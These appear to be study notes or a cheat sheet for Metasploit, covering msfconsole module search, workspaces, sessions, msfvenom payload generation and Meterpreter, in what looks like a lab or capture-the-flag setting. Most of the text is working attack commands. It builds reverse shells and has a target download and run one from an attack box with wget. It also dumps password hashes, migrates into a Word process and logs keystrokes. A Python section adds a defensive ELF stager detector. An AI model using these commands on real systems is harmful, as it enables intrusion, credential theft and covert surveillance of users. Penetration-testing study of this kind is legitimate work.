MSFCONSOLE
Finding Modules
Let's use port scanning as an example:
search portscan
pick a scanner:
use # <-- this is the number to the left of the module
then use
show options
to see what options are available for your choice. Set your options (for example):
set RHOSTS 10.10.12.148
Some modules support more than one payload. Run show options again after changing the payload, because the available options may change.
show payloads <-- Show the available payloads
set payload # <-- choose which payload to use.
Setting up a project database
Before you start msfconsole:
systemctl start postgresql
msfdb init
Start msfconsole then check
db_status
Working with workspaces (workspace -h):
workspace <-- lists workspaces
workspace -a timmy <-- creates a new workspace named timmy
workspace default <-- switches from timmy back to the default workspace
workspace -d timmy <-- deletes the workspace called timmy
Once you're in a workspace, run 'help' to see what you can do and what gets stored in that database. For example, 'db_nmap -sV -p- 10.10.12.229' runs an nmap scan and stores everything it finds in the database so you can recall it later.
hosts -h or services -h <-- help for those commands
hosts <-- shows all the hosts it found
services <-- shows all the services it found for those hosts
services -S netbios <-- shows the service for just netbios
hosts -R <-- sets the stored hosts as RHOSTS for the current module. If there is more than one host, all of them are set as the RHOSTS option.
Working with Sessions
sessions <-- see your sessions
sessions -i # <-- interact with the numbered session
ctrl+z <-- background a session
ctrl+c <-- exit a session
Accept Incoming Shells
use exploit/multi/handler <-- catches incoming connections from payloads generated with Metasploit
An example usage:
use exploit/multi/handler
set payload php/reverse_php
set lhost 10.10.24.119
set lport 7777
show options
run
MSFVENOM
This lets you create standalone payloads; it is a companion tool on the Metasploit side.
msfvenom -l payloads <-- list all the payloads
msfvenom -l payloads | grep "linux/x86" | grep "reverse_tcp" <-- search for a linux payload that gives us a reverse tcp connection
msfvenom -l formats <-- list supported output formats (-f picks one)
-e <encoder> <-- encodes the payload with the named encoder (encoding, not obfuscation; list them with msfvenom -l encoders)
msfvenom -p php/reverse_php LHOST=10.0.2.19 LPORT=7777 -f raw > reverse_shell.php <-- example php reverse shell. NOTE: the raw output does not include the PHP tags, so be sure to add them when editing the file afterwards.
An Example
We have a way to upload a file to the target, which is a Linux system.
First, we create a reverse shell on our attack box using msfvenom
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=XXXX -f elf > rev_shell.elf
Next we host it on a python web server on our attack box
python3 -m http.server 9000
We download the file on the vulnerable linux box
wget http://[ATTACK-BOX]:9000/rev_shell.elf
We set it as executable
chmod +x rev_shell.elf
We run the .elf file on the vulnerable linux box
./rev_shell.elf
Switching back over to our attack box we start msfconsole and start the listener.
msfconsole
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST [ATTACK-BOX-IP]
set LPORT 4444
run
This should catch our reverse shell. Now that we have a shell, we background it with ctrl+z, taking note of the session number. We then search for a module to run against that session; in this example we dump password hashes:
search linux hashes
use 0
set session 2
exploit
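From the defender's side, the rev_shell.elf built in the first step of this walkthrough is worth recognising on disk: a stager dropped with msfvenom -f elf is typically a tiny image with no section header table and a single loadable segment that is readable, writable and executable at once. The following Python is an added example, not part of the original notes or of Metasploit; the three indicators it checks are a heuristic assumed here (hand-written or packed binaries can trip them too), and the ELF bytes it inspects are constructed inline rather than real msfvenom output.

```python
import struct

PT_LOAD, RWX = 1, 7  # p_type of a loadable segment; p_flags PF_R|PF_W|PF_X

def elf_payload_indicators(data: bytes) -> list:
    """Heuristic triage: return indicator strings; an empty list means nothing flagged."""
    if len(data) < 52 or data[:4] != b"\x7fELF":
        return ["not an ELF image"]
    e = "<" if data[5] == 1 else ">"      # EI_DATA: 1 = little-endian
    elf64 = data[4] == 2                  # EI_CLASS: 2 = 64-bit
    # e_phoff format/offset, and where (e_phentsize, e_phnum, e_shentsize, e_shnum) sit
    ph_fmt, ph_at, tbl_at = (e + "Q", 0x20, 0x36) if elf64 else (e + "I", 0x1C, 0x2A)
    try:
        e_phoff = struct.unpack_from(ph_fmt, data, ph_at)[0]
        e_phentsize, e_phnum, _, e_shnum = struct.unpack_from(e + "HHHH", data, tbl_at)
        loads = []
        for i in range(e_phnum):
            off = e_phoff + i * e_phentsize
            p_type = struct.unpack_from(e + "I", data, off)[0]
            # p_flags follows p_type directly in ELF64, sits at +0x18 in ELF32
            p_flags = struct.unpack_from(e + "I", data, off + (4 if elf64 else 0x18))[0]
            if p_type == PT_LOAD:
                loads.append(p_flags)
    except struct.error:
        return ["truncated or malformed headers"]
    hits = []
    if e_shnum == 0:
        hits.append("no section header table")
    if any((f & RWX) == RWX for f in loads):
        hits.append("RWX PT_LOAD segment")
    if e_phnum == 1 and len(data) < 4096:
        hits.append("single-segment image under 4 KiB")
    return hits

def build_elf32(body: bytes, p_flags: int, shnum: int = 0) -> bytes:
    """Constructed sample (header fields only, not real msfvenom output): ELF32 LE, one PT_LOAD."""
    ident = b"\x7fELF" + bytes([1, 1, 1]) + b"\x00" * 9
    ehdr = ident + struct.pack("<HHIIIIIHHHHHH", 2, 3, 1, 0x08048054, 52, 0, 0,
                               52, 32, 1, 40, shnum, 0)
    size = 52 + 32 + len(body)
    phdr = struct.pack("<IIIIIIII", PT_LOAD, 0, 0x08048000, 0x08048000, size, size, p_flags, 0x1000)
    return ehdr + phdr + body

# Constructed samples: a stager-shaped image versus a larger, sectioned, non-RWX one.
PAYLOAD_LIKE = build_elf32(b"\x90" * 64, RWX)
BENIGN_LIKE = build_elf32(b"\x90" * 4096, 5, shnum=5)   # p_flags 5 = PF_R | PF_X
```

Running elf_payload_indicators over uploads directories or a quarantine folder gives a cheap first-pass signal; confirm a hit by checking the segment contents and any outbound connection the process makes.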

METERPRETER
Meterpreter will run in memory, as a process, on the target system and act as an encrypted TLS agent within a command and control architecture.
Always run the help menu to see the available commands. Each meterpreter shell is different based on the system and payload it's using. Here are a few commands that might be useful
getuid <-- see which user you're running as.
hashdump <-- dump the SAM database hashes (Windows targets)
search -f flag.txt <-- searches for a file named flag.txt
shell <-- get a cmd shell (ctrl+z will bring you back)
load python <-- loads the python extension; others such as kiwi (mimikatz) can be loaded the same way
Migrating your Meterpreter process into that of another application can sometimes prove useful (just note that you may lose your privileges). For example, say we list the running processes with ps. We see a Word process there, so we migrate into it and start capturing keystrokes:
ps
migrate 1276
keyscan_start
keyscan_stop
keyscan_dump